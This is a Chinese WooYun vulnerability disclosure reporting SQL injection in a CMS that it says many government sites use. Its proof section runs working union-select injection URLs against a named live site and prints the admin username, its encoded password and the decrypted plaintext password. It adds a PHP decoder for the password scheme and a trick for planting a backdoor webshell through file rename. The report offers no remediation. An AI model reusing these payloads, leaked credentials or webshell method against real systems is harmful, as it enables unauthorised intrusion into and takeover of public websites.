当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06831

漏洞标题:大量政府网站使用的安徽商网的建站系统存在sql注入(再续)

相关厂商:安徽商网

漏洞作者: 安静

提交时间:2012-05-08 21:58

修复时间:2012-05-08 21:58

公开时间:2012-05-08 21:58

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-05-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

老洞了,http://www.wooyun.org/bugs/wooyun-2010-04869 http://www.wooyun.org/bugs/wooyun-2010-05331 这cms应该是某个版本的注射不知道怎么没人发,估计日这cms的都碰到过吧.

详细说明:

不会说,看漏洞证明吧.亲.

漏洞证明:

随便找了个目标.
http://jiuye.axhu.cn/include/web_content.php?id=8976+and+1=2+union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+web_user
会直接跳转到 http://jiuye.axhu.cn/include/11 返回404.


开始也以为注射不了,后来看URL,http://jiuye.axhu.cn/include/11 有个11..估计你们日的时候应该碰到过.
然后http://jiuye.axhu.cn/include/web_content.php?id=8976+and+1=2+union select 1,2,3,4,5,6,7,8,9,10,
concat(0x285E,username,0x7C,password,0x5E29),12,13,14,15,16,17,18,19,20+from+web_user
返回http://jiuye.axhu.cn/include/(%5Extgl%7C11161c3f4e4e4747%5E) 管理和密码暴出来了.


解密出来明文为xtgl nic@1188.


贴个解密;

<?php
function authcode($string,$operation='ENCODE') {
if ($operation=='ENCODE'){
$OutTxt = "";
for ($x=0;$x<strlen($string);$x++) {
$nr = ord($string[$x]);
if ($nr < 128) {
$nr += 128;
}
elseif ($nr > 127) {
$nr -= 128;
}
$nr = 255 - $nr;
$OutTxt .= sprintf("%02x", $nr);
}
return $OutTxt;
}else{
$OutTxt = "";
for ($x=0;$x<(strlen($string)/2);$x++) {
$nr = hexdec($string[$x * 2] . $string[($x * 2) + 1]);
$nr = 255 - $nr;
if ($nr < 128) {
$nr += 128;
}
elseif ($nr > 127) {
$nr -= 128;
}
$OutTxt .= chr($nr);
}
return $OutTxt;
}
}
if(isset($_GET["code"])) echo authcode($_GET["code"],"x");
?>


关于后台拿shell. 除了之前那些.在文件管理处可以新建比如内容为后门的x.txt 然后利用改名功能改成x.php. 后面有个点. 确认后,自动过滤最后的点,为x.php
PS:我好蛋疼.不知道怎么写.希望骗个邀请码.

修复方案:

我不会.

版权声明:转载请注明来源 安静@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)